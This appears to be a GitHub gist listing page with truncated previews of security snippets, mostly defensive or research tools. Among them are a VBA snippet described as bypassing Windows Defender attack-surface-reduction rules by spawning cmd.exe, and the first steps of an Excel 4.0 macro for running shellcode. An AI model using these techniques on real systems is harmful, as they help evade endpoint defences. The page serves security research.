Skip to content

Instantly share code, notes, and snippets.

@wdormann
wdormann / dangerous.reg
Created Aug 11, 2022
Have Windows treat dangerous files as, well, dangerous. List courtesy @Laughing_Mantis
View dangerous.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"HighRiskFileTypes"=".appinstaller;.application;.appx;.appxbundle;.diagcab;.diagpkg;.diagcfg;.fluid;.fxb;.glb;.gltf;.library-ms;.loop;.msix;.partial;.perfmoncfg;.pko;.ply;.ppkg;.qds;.rat;.resmoncfg;.search-ms;.searchConnector-ms;.settingcontent-ms;.stl;.symlink;.theme;.themepack;.UDL;.url;.wab;.wbcat;.wcx;.website;.whiteboard;.xbap;.ZFSendToTarget;"
@bontchev
bontchev / unhide.py
Last active Jun 22, 2020
A script for unhiding hidden Excel sheets
View unhide.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
try:
import olefile
View gist:cee5cfb9d4bb1becc14fd1dd1df22601
# Unhide all the very hidden sheets in an Office 97 Excel file.
from __future__ import print_function
import re
import sys
# Read in the Excel file for which to unhide sheets.
fname = sys.argv[1]
f = open(fname, 'rb')
data = f.read()
@multiplex3r
multiplex3r / loadPcap.py
Last active Apr 15, 2021
Load a PCAP into neo4j with scapy
View loadPcap.py
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
pkt = packet.split()
@Arno0x
Arno0x / shellcode.xlsm
Last active Aug 16, 2022
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
@djhohnstein
djhohnstein / theircorp.tlb
Created Jan 23, 2019
TypeLib - Details. .tlb
View theircorp.tlb
https://ghostbin.com/paste/4x325
<o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o>
* * * * * * * * * * * * * * * * * * * * *
* *
* *
* The Unofficial *
* *
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active Jun 30, 2022
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
View dedosfuscator.py
import sys
import re
if len(sys.argv) <= 1: exit()
scriptpath = sys.argv[1]
with open(scriptpath, 'r') as scriptfile:
script = scriptfile.read().replace('^', '')
p = re.compile('\([Ss][Ee][Tt][^=]+=([^&]+)&&')
s = p.search(script)
@wdormann
wdormann / acltest.ps1
Created May 1, 2018
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
View acltest.ps1
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
Break
}
$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
# This prints a table of ACLs
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights
@leechristensen
leechristensen / settingcontent-ms.xsd
Created Jun 22, 2017
.settingcontent-ms XML Schema (embedded in shell.dll)
View settingcontent-ms.xsd
<?xml version="1.0" encoding="utf-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ac="http://schemas.microsoft.com/Search/2013/SettingContent" targetNamespace="http://schemas.microsoft.com/Search/2013/SettingContent" elementFormDefault="qualified" >
<xsd:annotation>
<xsd:documentation xml:lang="en">Copyright (C) Microsoft. All rights reserved.
Searchable setting content file schema.
</xsd:documentation>
</xsd:annotation>
<xsd:element name="SearchableContent" type="ac:SearchableContentType"/>
<xsd:complexType name="SearchableContentType">
<xsd:sequence>